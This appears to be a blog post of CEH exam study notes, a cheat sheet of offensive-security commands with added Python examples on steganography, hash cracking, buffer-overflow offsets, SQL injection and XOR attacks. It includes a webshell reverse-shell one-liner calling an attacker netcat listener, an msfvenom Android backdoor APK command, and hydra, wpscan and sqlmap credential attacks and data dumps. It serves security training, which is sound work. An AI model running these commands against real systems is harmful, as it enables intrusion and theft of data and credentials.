Practical Notes on CEH (Certified Ethical Hacker)
- Songül ÖZÜGÜRLER
- 28 April
- 4 min read
Introduction: Certified Ethical Hacker (CEH) is a certification program that equips individuals with the skills needed to identify and counteract potential security threats. In this article, we will delve into various tools and techniques commonly used in ethical hacking.
Network Enumeration:
SMB Enumeration Commands (nmblookup, smbmap, rpcclient, smbclient and enum4linux; only the vulnerability check uses Nmap):
- Enumerate Hostname (NetBIOS name lookup): nmblookup -A [ip]
- List Shares: smbmap -H [ip/hostname]
- Check Null Sessions (anonymous access with no credentials):
- smbmap -H [ip/hostname] (no -u/-p given, so an empty username and password are tried)
- rpcclient -U "" -N [ip]
- smbclient -N \\\\[ip]\\[share name]
- Check for Vulnerabilities: nmap --script "smb-vuln*" -p 139,445 [ip] (quote the pattern so the shell does not expand it)
- Overall Scan: enum4linux -a [ip]
Web Application Testing:
CEWL:
- CEWL Function: Generate a wordlist from the words used on a website (useful as input for password guessing against that organisation).
- How to Use CEWL (-m = minimum word length, -w = output file):
- cewl -m 4 -w wordlist.txt http://10.10.10.10
- cewl -m 5 -w words.txt http://example.com
Fuzzing (directory and file brute force):
- gobuster dir -e -u http://10.10.10.10 -w /usr/share/wordlists/medium.txt (dir is the directory mode; -e prints full URLs)
- dirb http://10.10.10.10 /usr/share/wordlists/medium.txt
Password Cracking:
Hashcat:
- Crack Hash Value to Plaintext (the hash type is selected with -m; hashcat --help lists the mode numbers):
- hashcat -m <mode> hash.txt rockyou.txt
- hashcat.exe -m <mode> hash.txt rockyou.txt -O
- Crack NTLMv2 (captured Net-NTLMv2 responses, mode 5600; plain NTLM hashes from the SAM are mode 1000):
- hashcat -m 5600 ntlmhash.txt rockyou.txt
- (--force ignores warnings about unsupported drivers and is not recommended; -O uses optimized kernels, which are faster but limit the maximum password length)
ADB and PhoneSploit:
- Install ADB: apt-get install adb
- Clone PhoneSploit: git clone github.com/01010000/phonesploit
- Run PhoneSploit: python3 phonesploit.py
- Connect to a phone that exposes ADB over the network (TCP port 5555), open a shell, and run commands on it.
SQL Injection:
SQLMap (--batch accepts the default answer to every prompt; -D selects a database, -T a table):
- Database Enumeration:
- sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
- Table Enumeration:
- sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch
- Column Enumeration:
- sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
- Retrieve All Data:
- sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch
URL Shell (reverse shell sent through a command-execution web shell):
- <webshell>.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.10.111 4051 >/tmp/f
- (10.2.10.111:4051 is the attacker's netcat listener; the cmd value must be URL-encoded when it is sent from a browser or curl)
Steganography:
Tools:
- OpenStego:
- openstego extract -sf openstego.png -p abcd -xf output.txt
- (-sf = stego file, -p = password, -xf = name for the extracted file; leave out -xf to restore the file under its original name)
- Stegsolve:
- wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar
- java -jar stegsolve.jar
- Stego Toolkit: https://github.com/DominicBreuker/stego-toolkit
Password Cracking:
John the Ripper:
- MD5:
- john --format=raw-md5 password.txt
Hydra:
Brute Force using Hydra (-l/-L: single user / user list, -P: password list, -t: parallel tasks, -f: stop after the first valid pair, -V: show every attempt):
- FTP: hydra -l root -P passwords.txt [-t 32] <IP> ftp
- MySQL: hydra -L usernames.txt -P pass.txt <IP> mysql
- RDP: hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
Web Vulnerability Scanners:
WPScan:
- Brute Force Username/Password Login:
- wpscan --url http://10.10.10.10/ -U 'admin' -P /usr/share/wordlists/medium.txt
- Normal Scanning:
- wpscan --url <URL>
- Enumerate Users:
- wpscan --url https://10.10.10.10/ --enumerate u
Skipfish:
- Active web application reconnaissance tool: crawls the site, probes for common flaws and writes an HTML report.
Uniscan:
- Web vulnerability scanner; its reports are written under /usr/share/uniscan/report
Hashing and Encryption:
HashCalc:
- Calculate hash, checksum, and HMAC values.
CryptoForge:
- Encryption and Decryption tool.
VeraCrypt:
- Disk and volume encryption tool. The attack covered is not breaking the cipher but obtaining the on-the-fly encryption keys (they are held in RAM while a volume is mounted) and extracting them, e.g. from a memory image.
Cryptool:
- Cryptography Analysis Tool.
Android Hacking:
MSFVenom for Android:
- Generate Android Meterpreter Payload (LHOST/LPORT point back at the Metasploit handler; R writes raw output):
- msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=<ip> LPORT=<port> R > Desktop/Backdoor.apk
Metasploit Database:
- Start the PostgreSQL database used by msfconsole before running the handler: service postgresql start
Steganography and Hashing:
SNOW.EXE — Steganography Tool
SNOW.EXE is a steganography tool that hides information in text files using “whitespace steganography”: the message is encoded in the spaces and tabs at the ends of lines, which most viewers and editors do not display.
Usage Example:
SNOW.EXE -C -m "hidden_message" -p "password" coverfile.txt outputfile.txt
- -C : Compress the message before hiding it (and decompress it when extracting).
- -m "hidden_message" : The message to be concealed (-f reads the message from a file instead).
- -p "password" : Password used to encrypt the message; optional, but without it anyone who suspects the file can extract the text.
- coverfile.txt : The cover text that carries the hidden message.
- outputfile.txt : Output file containing the cover text plus the hidden whitespace.
Extraction uses the same options without -m (or -f), with the output file given as the input.
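The encoding idea behind SNOW, shown as an added example (this is not SNOW's code, and SNOW's real bit packing, compression and encryption differ): each message bit becomes a trailing space (0) or tab (1), a 16-bit length prefix marks where the payload ends, and the visible text is unchanged. The cover text and message are constructed here.

```python
"""Whitespace steganography in the style of SNOW (added example, not SNOW's
own scheme): hide bytes in the trailing spaces/tabs of a cover text."""

BITS_PER_LINE = 8          # assumption: one message byte per carrier line

# Constructed cover text: 20 ordinary lines with no trailing whitespace.
SAMPLE_COVER = "\n".join(f"Cover line {i}." for i in range(20))


def _to_bits(data: bytes) -> str:
    return "".join(f"{b:08b}" for b in data)


def conceal(cover: str, message: bytes) -> str:
    """Return the cover with `message` (length-prefixed) in trailing whitespace."""
    if len(message) > 0xFFFF:
        raise ValueError("message too long for the 16-bit length prefix")
    bits = _to_bits(len(message).to_bytes(2, "big") + message)
    lines = cover.split("\n")
    needed = -(-len(bits) // BITS_PER_LINE)           # ceiling division
    if needed > len(lines):
        raise ValueError(f"cover has {len(lines)} lines, need {needed}")
    out = []
    for i, line in enumerate(lines):
        chunk = bits[i * BITS_PER_LINE:(i + 1) * BITS_PER_LINE]
        # Existing trailing whitespace is stripped so it cannot corrupt decoding.
        out.append(line.rstrip(" \t") + "".join("\t" if b == "1" else " " for b in chunk))
    return "\n".join(out)


def reveal(stego: str) -> bytes:
    """Recover the hidden message; b'' if no complete payload is present."""
    bits = ""
    for line in stego.split("\n"):
        body = line.rstrip(" \t")
        for ch in line[len(body):]:               # only the trailing run carries data
            bits += "1" if ch == "\t" else "0"
    if len(bits) < 16:
        return b""
    length = int(bits[:16], 2)
    payload = bits[16:16 + 8 * length]
    if len(payload) < 8 * length:
        return b""                                # truncated, or not a carrier at all
    return bytes(int(payload[i:i + 8], 2) for i in range(0, len(payload), 8))


def capacity(cover: str) -> int:
    """Message bytes that fit in `cover`, the figure SNOW reports with -S."""
    return max(0, len(cover.split("\n")) * BITS_PER_LINE // 8 - 2)


if __name__ == "__main__":
    stego = conceal(SAMPLE_COVER, b"CEH notes")
    print(repr(stego.split("\n")[0]))             # visible text intact, trailing tabs/spaces added
    print(reveal(stego))
    print("capacity:", capacity(SAMPLE_COVER), "bytes")
```

Detection follows from the same property: a text file whose lines end in mixed runs of tabs and spaces is suspicious, and `cat -A` or a hex dump makes the carrier visible even though an editor does not.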
Magic Number Analysis:
Every file type typically begins with specific “magic numbers”, a fixed byte signature at a known offset, that identifies the format regardless of the file extension. The file command reads that signature to identify the type:
file [file_name]
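What file(1) does in its first step, written out as an added example (not the page's code and not libmagic): compare the leading bytes against a signature table, honouring the offset because some formats, such as tar, do not put their signature at byte 0. The signature table is a small hand-picked subset and the sample files are constructed in memory.

```python
"""Identify a file type from its magic bytes (added example, not libmagic)."""
from typing import List, Tuple

# (offset, signature, description). Offsets matter: "ustar" sits at byte 257.
SIGNATURES: List[Tuple[int, bytes, str]] = [
    (0, b"\x7fELF", "ELF executable"),
    (0, b"MZ", "PE/DOS executable"),
    (0, b"\x89PNG\r\n\x1a\n", "PNG image"),
    (0, b"\xff\xd8\xff", "JPEG image"),
    (0, b"GIF87a", "GIF image"),
    (0, b"GIF89a", "GIF image"),
    (0, b"%PDF-", "PDF document"),
    (0, b"PK\x03\x04", "ZIP archive (also DOCX/APK/JAR)"),
    (0, b"\x1f\x8b", "gzip compressed data"),
    (0, b"Rar!\x1a\x07", "RAR archive"),
    (0, b"\xca\xfe\xba\xbe", "Java class / Mach-O fat binary"),
    (257, b"ustar", "POSIX tar archive"),
]


def identify(data: bytes) -> str:
    """Description of the first matching signature, else a text/binary guess."""
    for offset, sig, desc in SIGNATURES:
        if data[offset:offset + len(sig)] == sig:
            return desc
    # No signature matched: cheap printable-ASCII test on the first 512 bytes.
    if data and all(b in b"\t\n\r" or 32 <= b < 127 for b in data[:512]):
        return "ASCII text"
    return "data"


def identify_file(path: str) -> str:
    with open(path, "rb") as fh:
        return identify(fh.read(512))


if __name__ == "__main__":
    # Constructed samples: a PNG with a misleading .txt name, text, a tar header.
    samples = {
        "photo.txt": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        "notes.bin": b"hello world\n",
        "archive.dat": b"\x00" * 257 + b"ustar\x00",
    }
    for name, blob in samples.items():
        print(f"{name}: {identify(blob)}")
```

The practical point is the first sample: an extension says nothing, and a web upload filter that trusts it will accept a PHP file named `.png` unless it also checks the bytes.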
Hash Analysis:
Manual Hash Analysis:
Using name-that-hash :
apt install name-that-hash
nth --text [hash]
This tool lists the likely hash types for the entered value, most likely first, together with the hashcat -m and john --format values to use; a 32-character hex digest, for example, could be MD5 or NTLM.
Using hashcat and john :
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha512 hash.txt
hashcat -m 1700 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Both commands run a dictionary attack against the same hash type (raw SHA-512 is john format raw-sha512 and hashcat mode 1700; -a 0 is hashcat's straight dictionary attack mode).
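The two steps above, identification then a dictionary attack, as an added example in Python (not the page's code and not name-that-hash, john or hashcat). The candidate table is deliberately small and pairs each shape with the hashcat mode and john format names used on this page; the wordlist and target hashes are constructed.

```python
"""Identify a hash by shape, then dictionary-attack it with the matching
algorithm (added example; not name-that-hash/john/hashcat code)."""
import hashlib
import re
from typing import Iterable, List, Optional, Tuple

# hex length -> candidates as (name, hashlib name, hashcat -m, john --format)
HEX_CANDIDATES = {
    32:  [("MD5", "md5", 0, "raw-md5"), ("NTLM", "md4", 1000, "nt")],
    40:  [("SHA-1", "sha1", 100, "raw-sha1")],
    64:  [("SHA-256", "sha256", 1400, "raw-sha256")],
    128: [("SHA-512", "sha512", 1700, "raw-sha512")],
}

# Constructed samples (a real engagement reads these from a dump file).
SAMPLE_WORDLIST = ["letmein", "qwerty", "password123", "admin", "Summer2024"]
SAMPLE_SHA512 = hashlib.sha512(b"password123").hexdigest()
SAMPLE_MD5 = hashlib.md5(b"admin").hexdigest()


def identify_hash(h: str) -> List[Tuple[str, Optional[str], int, str]]:
    """Candidate types, most likely first. Salted formats are recognised by prefix."""
    h = h.strip()
    if re.fullmatch(r"\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}", h):
        return [("bcrypt", None, 3200, "bcrypt")]
    if re.fullmatch(r"\$6\$[^$]{1,16}\$[./A-Za-z0-9]{86}", h):
        return [("sha512crypt", None, 1800, "sha512crypt")]
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return HEX_CANDIDATES.get(len(h), [])
    return []


def dictionary_attack(target: str, words: Iterable[str], algo: str) -> Optional[str]:
    """Hash every candidate word with `algo` and compare; None if not found."""
    target = target.strip().lower()
    for w in words:
        w = w.rstrip("\n")
        if hashlib.new(algo, w.encode()).hexdigest() == target:
            return w
    return None


def crack(target: str, words: List[str]) -> Optional[Tuple[str, str]]:
    """Try each hashlib-backed candidate type; return (type name, password)."""
    for name, algo, _mode, _fmt in identify_hash(target):
        if algo is None:
            continue                      # bcrypt/sha512crypt need their own KDF code
        try:
            found = dictionary_attack(target, words, algo)
        except ValueError:
            continue                      # e.g. md4 missing on OpenSSL 3 without legacy provider
        if found is not None:
            return name, found
    return None


if __name__ == "__main__":
    for h in (SAMPLE_SHA512, SAMPLE_MD5):
        print([(c[0], c[2], c[3]) for c in identify_hash(h)], "->", crack(h, SAMPLE_WORDLIST))
```

The ambiguity of the 32-hex case is why `nth` prints several hits and why hashcat refuses to guess: the same digest is tried as MD5 and, if that fails, as NTLM (MD4 over the UTF-16LE password, which the example leaves to hashcat since MD4 is not always available in Python).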
Web Security Analysis:
Brute Force with Burp Suite:
Burp Suite (Intruder) is used for brute-force attacks on web login forms: the login request is captured through the proxy, the username and password fields are marked as payload positions, and a wordlist is applied to them while response length or status is watched for the successful attempt.
Network Traffic Analysis with Wireshark:
Wireshark captures and analyzes network traffic. Credentials sent over cleartext protocols (HTTP, FTP, Telnet, POP3) can be read directly from the capture, for example with Follow TCP Stream.
Advanced Exploitation Techniques:
Buffer Overflow Exploitation:
A buffer overflow occurs when more data is written into a buffer than it can hold, so the excess overwrites adjacent memory, on the stack including the saved return address. This can be exploited to execute arbitrary code.
Steps for Exploitation:
- Identify Vulnerable Software: Use fuzzers (inputs of increasing length) to find an input that crashes the program, which points to a buffer without bounds checking.
- Craft the Exploit: Develop a payload that includes the malicious code (shellcode) to be executed.
- Control EIP (the 32-bit instruction pointer; RIP on 64-bit): Send a unique cyclic pattern, read the value in EIP at the crash to find the exact offset of the return address, then overwrite it at that offset to control the flow of the program.
- Execute Payload: Direct the program to the payload (e.g. by pointing EIP at a jmp esp instruction), leading to potential system compromise.
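The "control EIP" step, as an added example (not the page's code): a Metasploit-style cyclic pattern is generated, the crashed instruction-pointer value is looked up in it, and the offset of the return address falls out. There is no real vulnerable binary here; the crash is simulated with a constructed stack frame whose layout (64-byte buffer, 8 bytes of saved registers, then the return address) is an assumption of the example.

```python
"""Cyclic-pattern offset finding, what msf-pattern_create/pattern_offset do
(added example; the crash is simulated, not a real binary)."""
import string
import struct
from typing import Optional


def pattern_create(length: int) -> bytes:
    """Pattern Aa0Aa1Aa2... : every 4-byte window is unique up to 20280 bytes."""
    out = bytearray()
    for up in string.ascii_uppercase:
        for low in string.ascii_lowercase:
            for dig in string.digits:
                out += (up + low + dig).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is not unique")


def pattern_offset(pattern: bytes, value: int, bits: int = 32) -> Optional[int]:
    """Offset of the register value inside `pattern`, trying both byte orders."""
    fmt = "<I" if bits == 32 else "<Q"
    le = struct.pack(fmt, value)
    for needle in (le, le[::-1]):          # little-endian first, then big-endian
        idx = pattern.find(needle)
        if idx != -1:
            return idx
    return None


def simulate_crash(payload: bytes, buf_size: int = 64, saved_regs: int = 8) -> int:
    """Toy 32-bit frame: [buffer][saved regs][return address]; returns 'EIP'.

    Assumed layout for the example: the payload is copied without a bounds
    check, so bytes past buf_size + saved_regs land on the return address."""
    ret_slot = buf_size + saved_regs
    frame = bytearray(ret_slot + 4)
    n = min(len(payload), len(frame))
    frame[:n] = payload[:n]
    return struct.unpack("<I", frame[ret_slot:ret_slot + 4])[0]


if __name__ == "__main__":
    pat = pattern_create(200)
    eip = simulate_crash(pat)
    print(f"EIP at crash: 0x{eip:08x}  -> offset {pattern_offset(pat, eip)}")
    # With the offset known the exploit is: b"A" * offset + return address + shellcode
```

A value that is only found reversed means the bytes went into the register in the opposite order from what was assumed, which is itself a useful hint about how the overwrite happened; no match at all usually means the crash clobbered something other than the return address.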
SQL Injection:
SQL Injection is a technique where an attacker inserts or “injects” a SQL query via the input data from the client to the application.
Exploitation Techniques:
- Union-Based SQL Injection: Using the UNION SQL operator to append a second SELECT (with the same number of columns) to the original query so that its results, e.g. rows from a users table, come back in the normal response.
- Error-Based SQL Injection: Involves intentionally causing SQL errors so that the error message leaks information about the database structure.
- Blind SQL Injection: The application returns no query results or errors; the attacker asks true-or-false questions and reads the answer from a difference in the response (boolean-based) or in its timing (time-based), one bit at a time.
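The union-based and blind techniques above, and the `artists.php?artist=1` style of target the sqlmap commands enumerate earlier, as an added example (not the page's code and not the testphp.vulnweb.com application): a query built by string concatenation next to the parameterised version that defeats the same payloads. The tables here are a constructed stand-in for the acuart schema, and the data is made up.

```python
"""Union-based and boolean-blind SQL injection against a string-built query,
beside the parameterised fix (added example; in-memory SQLite stand-in)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the acuart schema with two small tables."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE artists(artist_id INTEGER, aname TEXT);
        CREATE TABLE users(uname TEXT, pass TEXT);
        INSERT INTO artists VALUES (1, 'r4w8173'), (2, 'Blad3');
        INSERT INTO users VALUES ('test', 'test'), ('admin', 'S3cr3t!');
    """)
    return con


def artist_vulnerable(con: sqlite3.Connection, artist_param: str) -> list:
    """The bug: the request parameter is concatenated into the SQL text."""
    sql = "SELECT artist_id, aname FROM artists WHERE artist_id = " + artist_param
    return con.execute(sql).fetchall()


def artist_safe(con: sqlite3.Connection, artist_param: str) -> list:
    """The fix: validate the type, then bind the value; it never becomes SQL."""
    try:
        artist_id = int(artist_param)
    except ValueError:
        return []
    return con.execute(
        "SELECT artist_id, aname FROM artists WHERE artist_id = ?", (artist_id,)
    ).fetchall()


# Union-based: the injected SELECT must match the column count (two here),
# which is what sqlmap's ORDER BY / NULL probing establishes first.
UNION_PAYLOAD = "1 UNION SELECT uname, pass FROM users"


def blind_probe(con: sqlite3.Connection, guess: str) -> bool:
    """Boolean-based blind: nothing from users is returned; the page only differs
    (row vs no row) depending on whether the guessed character is right."""
    payload = f"1 AND (SELECT substr(pass,1,1) FROM users WHERE uname='admin')='{guess}'"
    return len(artist_vulnerable(con, payload)) > 0


if __name__ == "__main__":
    con = make_db()
    print("union  :", artist_vulnerable(con, UNION_PAYLOAD))   # users rows leak
    print("safe   :", artist_safe(con, UNION_PAYLOAD))         # []
    print("blind S:", blind_probe(con, "S"), " blind A:", blind_probe(con, "A"))
```

The blind probe shows why `--dump` is slow on such targets: recovering one character of one field takes a handful of requests, and sqlmap automates exactly this loop over substr positions and character guesses.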
Cross-Site Scripting (XSS):
XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users.
Types:
- Stored XSS: The script is permanently stored on the target server (e.g. in a comment or profile field) and served to every user who views that page.
- Reflected XSS: The script arrives in the request (typically a URL parameter) and is echoed straight back in the response, so the victim has to be tricked into opening a crafted link.
- DOM-Based XSS: The vulnerability is in client-side JavaScript that writes attacker-controlled data (such as location.hash) into the page, rather than in the server-side code.
Social Engineering:
Social engineering involves manipulating people into breaking normal security procedures.
Common Techniques:
- Phishing: Deceptive emails and websites to trick individuals into revealing personal information.
- Pretexting: Creating a fabricated scenario to steal someone’s personal information.
- Baiting: Offering something enticing to steal personal information or infect systems with malware.
Cryptographic Attacks:
Types (ordered by how much the attacker is given; each is stronger than the one before):
- Ciphertext-Only Attack: The attacker has access only to a collection of ciphertexts.
- Known Plaintext Attack: The attacker has both some plaintext and its encrypted version under the unknown key.
- Chosen Plaintext Attack: The attacker can encrypt plaintexts of their choice and study the ciphertexts.
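A known-plaintext attack carried through on a toy cipher, as an added example (not the page's code): against a repeating-key XOR stream, one plaintext/ciphertext pair gives the keystream directly (key = plaintext XOR ciphertext), and the chosen-plaintext setting is the same attack where the attacker picks the plaintext, all-zero bytes being the most convenient. The cipher, key and messages are constructed; real ciphers are designed so that this class of attack does not work, which is the point of the classification.

```python
"""Known- and chosen-plaintext attacks on repeating-key XOR (added example;
the cipher and all messages are constructed)."""
from typing import Callable

SAMPLE_KEY = b"k3y!s"                                   # constructed secret key
SAMPLE_KNOWN = b"From: alice@example.com\r\nSubject: "  # predictable header = known plaintext


def xor_repeating(key: bytes, data: bytes) -> bytes:
    """Toy cipher: XOR each byte with the key, cycling. Encrypt == decrypt."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def guess_key_len(plaintext: bytes, ciphertext: bytes, max_len: int = 32) -> int:
    """Smallest period of the recovered keystream (pt XOR ct repeats with the key)."""
    stream = bytes(p ^ c for p, c in zip(plaintext, ciphertext))
    for n in range(1, max_len + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return n
    raise ValueError("no period found; the known text may be shorter than the key")


def recover_key(plaintext: bytes, ciphertext: bytes, key_len: int) -> bytes:
    """Known-plaintext: key[i] = pt[i] ^ ct[i]; needs one full key period."""
    if min(len(plaintext), len(ciphertext)) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    return bytes(p ^ c for p, c in zip(plaintext[:key_len], ciphertext[:key_len]))


def chosen_plaintext_oracle(key: bytes) -> Callable[[bytes], bytes]:
    """An encryption oracle the attacker may query: the chosen-plaintext setting.
    Querying it with zero bytes returns the key itself."""
    return lambda pt: xor_repeating(key, pt)


if __name__ == "__main__":
    ct = xor_repeating(SAMPLE_KEY, SAMPLE_KNOWN)
    n = guess_key_len(SAMPLE_KNOWN, ct)
    key = recover_key(SAMPLE_KNOWN, ct, n)
    print("recovered key:", key)
    # Every other message under the same key is now readable:
    other = xor_repeating(SAMPLE_KEY, b"transfer 40000 to account 7")
    print("other message:", xor_repeating(key, other))
    print("oracle(zeros):", chosen_plaintext_oracle(SAMPLE_KEY)(b"\x00" * n))
```

The ciphertext-only case is harder but not safe either: with enough ciphertext under a short repeating key, byte-frequency analysis per key position recovers the key without any known text.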